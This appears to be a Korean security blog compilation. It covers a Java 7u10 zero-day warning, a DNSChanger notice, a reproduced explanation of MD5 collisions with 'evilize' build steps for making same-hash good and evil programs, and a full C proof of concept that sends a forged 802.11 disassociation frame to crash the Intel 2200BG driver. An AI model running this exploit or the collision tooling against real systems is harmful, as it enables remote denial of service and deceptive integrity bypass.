자바 7u10 제로데이 취약점 발견



자바 SE 7 update 10버전 및 이하 버전에서 인증되지 않은 공격자가 원격에서


취약한 시스템에 악성 코드를 삽입할 수 있는 버그가 발견 되었습니다


이 취약점을 이용하면 특정 웹사이트에 방문하는 것만으로도 악성코드에 감염될 수 있습니다


현재 대세인 익스플로잇 툴인 블랙홀과 쿨은 해당 익스플로잇 코드를 추가했고


(이미 공격은 진행 중이라는 의미도 됩니다)


아마 메타스플로잇에도 곧 추가 되지 않을까 생각합니다


오라클 측은 해당 익스플로잇에 대한 업데이트를 하지 않고 있고


따라서 현재 저 취약점을 막기 위한 방법은 웹브라우저에서 자바플러그인을 해제 하는 것 뿐입니다


이 포스팅을 보셨다면 당장 브라우저 설정에서

자바플러그인을 해제 하십시오


저 번 제로데이 악성코드도 국내에 어마어마하게 유포되었습니다


자바가 플랫폼을 안 가리다보니 취약점이 한번 발생하면 무조건 대규모가 되는 군요




//2012.01.14 현재 버그를 해결한 JAVA SE 7 update 11이 배포되었습니다

릴리즈 노트


JAVA SE 7 Update 11 다운로드 페이지 링크



'Exploits' 카테고리의 다른 글

자바 7u10 제로데이 취약점 발견  (0) 2013.01.12
MD5Sum에 대한 해킹도구 출시!!!!  (0) 2008.07.22
Creative Commons License

FBI가 경고한 바이러스 주의!!!

5일 타임지는 전 세계의 컴퓨터 27만 대 이상이 ‘DNS체인저’라는 악성코드에 감염돼 9일 동시다발적인 인터넷 접속 이상이 발생할

수 있다고 경고했다!

DNS체인저는 사용자가 접속하려는 DNS(도메인을 IP주소로 변 환하는 서비스)를 마음대로 변경해 인터넷 접속 장애를 일으키는 악성코드이다

FBI는 아래사이트에접속시
http://www.dns-ok.us/

바로 뜨는 결과에
빨간불 = 감염
파란불 = 정상
이라고 설명했다


한국인터넷정보진흥원공지사항
http://www.boho.or.kr/kor/notice/noticeView.jsp?p_bulletin_writing_sequence=960
Creative Commons License

Aircarck이용한 무선 AP 비밀번호 탈취

보호되어 있는 글입니다. 내용을 보시려면 비밀번호를 입력하세요.

MD5Sum에 대한 해킹도구 출시!!!!

[home]
MD5 Collision Demo


Collisions in the MD5 cryptographic hash function

It is now well-known that the crytographic hash function MD5 has been broken. In March 2005, Xiaoyun Wang and Hongbo Yu of Shandong University in China published an article in which they describe an algorithm that can find two different sequences of 128 bytes with the same MD5 hash. One famous such pair is the following:
d131dd02c5e6eec4693d9a0698aff95c 2fcab58712467eab4004583eb8fb7f89 
55ad340609f4b30283e488832571415a 085125e8f7cdc99fd91dbdf280373c5b 
d8823e3156348f5bae6dacd436c919c6 dd53e2b487da03fd02396306d248cda0 
e99f33420f577ee8ce54b67080a80d1e c69821bcb6a8839396f9652b6ff72a70
and
d131dd02c5e6eec4693d9a0698aff95c 2fcab50712467eab4004583eb8fb7f89 
55ad340609f4b30283e4888325f1415a 085125e8f7cdc99fd91dbd7280373c5b 
d8823e3156348f5bae6dacd436c919c6 dd53e23487da03fd02396306d248cda0 
e99f33420f577ee8ce54b67080280d1e c69821bcb6a8839396f965ab6ff72a70 
Each of these blocks has MD5 hash 79054025255fb1a26e4bc422aef54eb4. Ben Laurie has a nice website that visualizes this MD5 collision. For a non-technical, though slightly outdated, introduction to hash functions, see Steve Friedle's Illustrated Guide.

Exploits

As we will explain below, the algorithm of Wang and Yu can be used to create files of arbitrary length that have identical MD5 hashes, and that differ only in 128 bytes somewhere in the middle of the file. Several people have used this technique to create pairs of interesting files with identical MD5 hashes:
  • Magnus Daum and Stefan Lucks have created two PostScript files with identical MD5 hash, of which one is a letter of recommendation, and the other is a security clearance.
  • Eduardo Diaz has described a scheme by which two programs could be packed into two archives with identical MD5 hash. A special "extractor" program turn one archive into a "good" program and the other into an "evil" one.

An evil pair of executable programs

The following is an improvement of Diaz's example, which does not need a special extractor. Here are two pairs of executable programs (one pair runs on Windows, one pair on Linux).
  • Windows version:
    • hello.exe. MD5 Sum: cdc47d670159eef60916ca03a9d4a007
    • erase.exe. MD5 Sum: cdc47d670159eef60916ca03a9d4a007
  • Linux version (i386):
    • hello. MD5 Sum: da5c61e1edc0f18337e46418e48c1290
    • erase. MD5 Sum: da5c61e1edc0f18337e46418e48c1290
These programs must be run from the console. Here is what happens if you run them:

C:\TEMP> md5sum hello.exe
cdc47d670159eef60916ca03a9d4a007
C:\TEMP> .\hello.exe
Hello, world!

(press enter to quit)
C:\TEMP> 

C:\TEMP> md5sum erase.exe
cdc47d670159eef60916ca03a9d4a007
C:\TEMP> .\erase.exe
This program is evil!!!
Erasing hard drive...1Gb...2Gb... just kidding!
Nothing was erased.

(press enter to quit)
C:\TEMP> 

How it works

The above files were generated by exploiting two facts: the block structure of the MD5 function, and the fact that Wang and Yu's technique works for an arbitrary initialization vector. To understand what this means, it is useful to have a general idea of how the MD5 function processes its input. This is done by an iteration method known as the Merkle-Damgard method. A given input file is first padded so that its length will be a multiple of 64 bytes. It is then divided into individual 64-byte blocks M0, M1, ..., Mn-1. The MD5 hash is computed by computing a sequence of 16-byte states s0, ..., sn, according to the rule: si+1 = f(si, Mi), where f is a certain fixed (and complicated) function. Here, the initial state s0 is fixed, and is called the initialization vector. The final state sn is the computed MD5 hash.

The method of Wang and Yu makes it possible, for a given initialization vector s, to find two pairs of blocks M,M' and N,N', such that f(f(s, M), M') = f(f(s, N), N'). It is important that this works for any initialization vector s, and not just for the standard initialization vector s0.

Combining these observations, it is possible to find pairs of files of arbitrary length, which are identical except for 128 bytes somewhere in the middle of the file, and which have identical MD5 hash. Indeed, let us write the two files as sequences of 64-byte blocks:

M0, M1, ..., Mi-1, Mi, Mi+1, Mi+2, ..., Mn,

M0, M1, ..., Mi-1, Ni, Ni+1, Mi+2, ..., Mn.

The blocks at the beginning of the files, M0, ..., Mi-1, can be chosen arbitrarily. Suppose that the internal state of the MD5 hash function after processing these blocks is si. Now we can apply Wang and Yu's method to the initialization vector si, to find two pairs of blocks Mi, Mi+1 and Ni, Ni+1, such that

si+2 = f(f(si, Mi), Mi+1) = f(f(si, Ni), Ni+1).

This guarantees that the internal state si+2 after the i+2st block will be the same for the two files. Finally, the remaining blocks Mi+2, ..., Mn can again be chosen arbitrarily.

So how can we use this technique to produce a pair of programs (or postscript files) that have identical MD5 hash, yet behave in arbitrary different ways? This is simple. All we have to do is write the two programs like this:

Program 1: if (data1 == data1) then { good_program } else { evil_program }
Program 2: if (data2 == data1) then { good_program } else { evil_program }

and arrange things so that "data1" = Mi, Mi+1 and "data2" = Ni, Ni+1 in the above scheme. This can even be done in a compiled program, by first compiling it with dummy values for data1 and data2, and later replacing them with the properly computed values.

Do it yourself: the "evilize" library

Here, you can download the software that I used to create MD5-colliding executable files. This software is based on Patrick Stach's implementation of Wang and Yu's algorithm. You can find his original implementation here.

Quick usage instructions:

Note for Windows users: the below instructions are for Unix/Linux. On Windows, you may have to append ".exe" to the names of executable files. Also, to use "make", you must have the GNU tools installed and working.

  1. Unpack the archive and build the library and tools:
        tar zxf evilize-0.1.tar.gz
        cd evilize-0.1
        make
    
    This creates the programs "evilize", "md5coll", and the object file "goodevil.o".
  2. Create a C program with multiple behaviors. Instead of the usual top-level function main(), write two separate top-level functions main_good() and main_evil(). See the file hello-erase.c for a simple example.
  3. Compile your program and link against goodevil.o. For example:
        gcc hello-erase.c goodevil.o -o hello-erase
    
  4. Run the following command to create an initialization vector:
        ./evilize hello-erase -i
    
  5. Create an MD5 collision by running the following command (but replace the vector on the command line with the one you found in step 4):
        ./md5coll 0x23d3e487 0x3e3ea619 0xc7bdd6fa 0x2d0271e7 > init.txt
    
    Note: this step can take several hours.
  6. Create a pair of good and evil programs by running:
        ./evilize hello-erase -c init.txt -g good -e evil
    
    Here "good" and "evil" are the names of the two programs generated, and "hello-erase" is the name of the program you created in step 3.

    NOTE: steps 4-6 can also be done in a single step, as follows:

        ./evilize hello-erase -g good -e evil
    
    However, I prefer to do the steps separately, since step 5 takes so long.
  7. Check the MD5 checksums of the files "good" and "evil"; they should be the same.
  8. Run the programs "good" and "evil" - they should exhibit the two different behaviors that you programmed in step 2.



사이트는 http://www.mathstat.dal.ca/
MD5Sum에 대한 사이트는 http://www.mathstat.dal.ca/~selinger/md5collision/

Peter Selinger 라는 수학교수가 MD5 알고리즘의 취약점에 대한 이해를 돕기 위한 목적으로 간단한 도구를 만들어, MD5 보안 홈페이지를 공개했다. 참고 자료도 충실히 제공하고 있고, 취약점에 대한 상세한 설명도 제공한다

'Exploits' 카테고리의 다른 글

자바 7u10 제로데이 취약점 발견  (0) 2013.01.12
MD5Sum에 대한 해킹도구 출시!!!!  (0) 2008.07.22
Creative Commons License

인텔 메모리 붕괴 버그>> Intel 2200BG 802.11 Disassociation Packet Kernel Memory Corruption

◎ 작성자: 해커즈뉴스
◎ 해당시스템: 9.0.3.9
◎ 발표날짜: 2007.02.03
◎ 유형: 원격
◎ 위험도:
2007/2/3(토)
인텔 메모리 붕괴 >> Intel 2200BG 802.11 Disassociation Packet Kernel Memory Corruption  
명칭 : 인텔 메모리 붕괴
발령일시 : 2월3일
해당시스템 : 9.0.3.9
위험도 : ★★★★☆
코드 작성자 : Breno Silva Pinto
■ 공격용 소스코드 제목
인텔 메모리 붕괴            


■ 발표날짜
2007.02.03


■ 해당 시스템
9.0.3.9


■ 공격유형
원격


■ 위험도



■ 최초보고자
mailto:bsilva at sekure.org


■ 문제점
인텔 무선 mini-pci 드라이버는 Intel 2200BG 카드에 제공되는데 여기서 메모리가 붕괴되는 버그가 발견되었다.

위조된 패킷을 전송함으로써 가능하며 내무 커널 구조를 붕괴시킨다.

공격의 결과를 한마디로 종합하자면 도스공격이 되는 셈이다.


■ 공격법 / 공격용 소스코드
Intel 2200BG 802.11 Disassociation packet Kernel Memory Corruption

Driver files:
w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725
w29mlres.dll 35afeccc4092b69f62d757c4707c74e9
w29NCPA.dll 980f58b157baedc23026dd9302406bdd

Proof Of Concept:
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <asm/types.h>
#include <linux/if.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

// 28 bytes disassociation packet.

char d[] = { 0xa0, 0x00, // 0xa0 pacote Disassociate 0xa000 FC Normal
           0x00, 0x00, // Duration ID
           0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr
           0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr
           0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id
           0x00, 0x00, // Frag. Number
           0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code

int main() {
      struct sockaddr_ll link;
      struct ifreq iface;
      int s;
      char packet[sizeof(d)];
      int len = 0;

      if((s=socket(PF_INET, SOCK_DGRAM, 0))<0)
              return 0;

      bzero(&iface,sizeof(iface));
      bzero(&link,sizeof(link));
      bzero(packet,sizeof(d));

      strcpy(iface.ifr_name,"ath0raw");

      if(ioctl(s,SIOCGIFHWADDR, &iface)) {
              return 0;
      }

      if(ioctl(s,SIOCGIFINDEX, &iface)) {
              return -1;
      }

      if((s=socket(PF_packET, SOCK_RAW, htons(ETH_P_ALL)))<0) {
              return -1;
      }

      link.sll_family = AF_packET;
      link.sll_ifindex = iface.ifr_ifindex;

if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) {
              return -1;
      }

      memcpy(packet,d,sizeof(d));
      len = sendto(s,packet,sizeof(d), 0, NULL, 0);
      usleep(5000);
      printf("%d bytes enviados\n",len);

      close(s);

      return 0;
}
Creative Commons License